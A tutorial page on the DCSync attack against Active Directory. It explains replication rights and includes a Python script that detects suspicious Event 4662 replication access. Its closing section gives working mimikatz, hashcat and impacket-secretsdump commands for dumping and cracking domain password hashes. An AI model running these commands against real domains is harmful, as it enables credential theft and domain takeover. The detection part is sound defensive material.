
💥 DCSync Attack


About The Attack

DCSync is an attack where an attacker impersonates a Domain Controller (DC) and requests account password data via the Directory Replication Service Remote Protocol (MS-DRSR).

Normally, DCs replicate with each other using this protocol. If an attacker compromises an account that holds replication rights, that account can issue the same replication requests and pull secrets (password hashes) from a real DC.


Gear Up (Prereqs)

The following rights and information are needed to perform the attack:

  1. Valid credentials (username plus password, hash or ticket) for a domain account that has replication rights.
  2. The account must hold one (or more) of the following rights in Active Directory:
    • Replicating Directory Changes
    • Replicating Directory Changes All
    • Replicating Directory Changes in Filtered Set
    These permissions are normally assigned only to Domain Admins, Enterprise Admins, Administrators and Domain Controllers.
  3. The attacker must be able to reach the Domain Controller over RPC, SMB and LDAP, since the replication protocol (MS-DRSR) is carried over these three protocols.
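Because the three rights above are the only thing that separates a legitimate DC from a DCSync client, the defensive check is to watch who actually exercises them. When auditing of directory service access is enabled, a DC logs Security Event 4662 with the GUID of the extended right that was used. The script below is an added example (not part of the original page) that parses a few constructed 4662 records and flags any principal other than a known DC computer account that used a replication control-access right. The three GUIDs are the real extended-right identifiers for the permissions listed above; the `;`-separated line layout, the `CORP` domain and the `DC01$`/`DC02$` account names are assumptions made for the example.

```python
"""
Detection example (added here, not the page's own code): flag Windows
Security Event 4662 records in which a non-DC principal exercised one of the
three directory-replication control-access rights that DCSync requires.
The sample events below are constructed, not real logs.
"""
import re
from dataclasses import dataclass

# Extended-right GUIDs of the three replication permissions named above.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS_MASK = 0x100  # "Control Access" bit in the 4662 AccessMask field

# Computer accounts of legitimate DCs (hypothetical names for this example).
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}

GUID_RE = re.compile(
    r"\{?([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\}?", re.I
)


@dataclass
class Event4662:
    subject: str        # DOMAIN\account that performed the access
    access_mask: int    # numeric AccessMask
    property_guids: list  # GUIDs found in the Properties field


def parse_event(line: str) -> Event4662:
    """Parse a flattened 'key=value;key=value' rendering of a 4662 event.

    Field names (SubjectDomainName, SubjectUserName, AccessMask, Properties)
    are the event's own; the ';'-separated single-line layout is constructed.
    """
    fields = dict(part.split("=", 1) for part in line.strip().split(";"))
    subject = f"{fields['SubjectDomainName']}\\{fields['SubjectUserName']}"
    mask = int(fields["AccessMask"], 16)
    guids = [g.lower() for g in GUID_RE.findall(fields.get("Properties", ""))]
    return Event4662(subject, mask, guids)


def replication_rights_used(ev: Event4662) -> list:
    """Names of the replication rights this event touched, in log order."""
    return [REPLICATION_RIGHTS[g] for g in ev.property_guids if g in REPLICATION_RIGHTS]


def is_suspicious(ev: Event4662) -> bool:
    """True when a replication right was exercised by anything but a known DC."""
    if not ev.access_mask & CONTROL_ACCESS_MASK:
        return False
    if not replication_rights_used(ev):
        return False
    account = ev.subject.split("\\", 1)[1]
    return account.upper() not in KNOWN_DC_ACCOUNTS


def find_dcsync_candidates(lines) -> list:
    """Return (subject, rights) for every suspicious event among the lines."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        if is_suspicious(ev):
            hits.append((ev.subject, replication_rights_used(ev)))
    return hits


# Constructed sample records: a normal DC-to-DC replication, an ordinary
# directory read by a user, and a user account pulling replication data.
SAMPLE_EVENTS = """
SubjectDomainName=CORP;SubjectUserName=DC02$;AccessMask=0x100;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
SubjectDomainName=CORP;SubjectUserName=jdoe;AccessMask=0x10;Properties={bf967a86-0de6-11d0-a285-00aa003049e2}
SubjectDomainName=CORP;SubjectUserName=jdoe;AccessMask=0x100;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
""".splitlines()

if __name__ == "__main__":
    for subject, rights in find_dcsync_candidates(SAMPLE_EVENTS):
        print(f"possible DCSync: {subject} used {', '.join(rights)}")
```

Only the third record is reported: the first is a DC replicating from a DC, and the second is a user touching a schema attribute without the Control Access bit set. In a real deployment the `KNOWN_DC_ACCOUNTS` allowlist would be populated from the domain's actual DC computer objects, and the same GUID match is what a SIEM rule for DCSync keys on.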

How to Perform The Attack

From a Windows machine

Using Mimikatz

After you have access to a user with local admin rights (and the replication rights listed above), use the commands below to get the hash of another user:

.\mimikatz.exe
lsadump::dcsync /user:domain\userName

The command above returns the NTLM hash of the specified user (for example, Administrator) if the attack succeeds.

Crack the Hash

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

DCSync From Kali

impacket-secretsdump -just-dc-user user domain.com/Local_admin:"Password"@<DC-IP>

user: the username whose hash you want to fetch.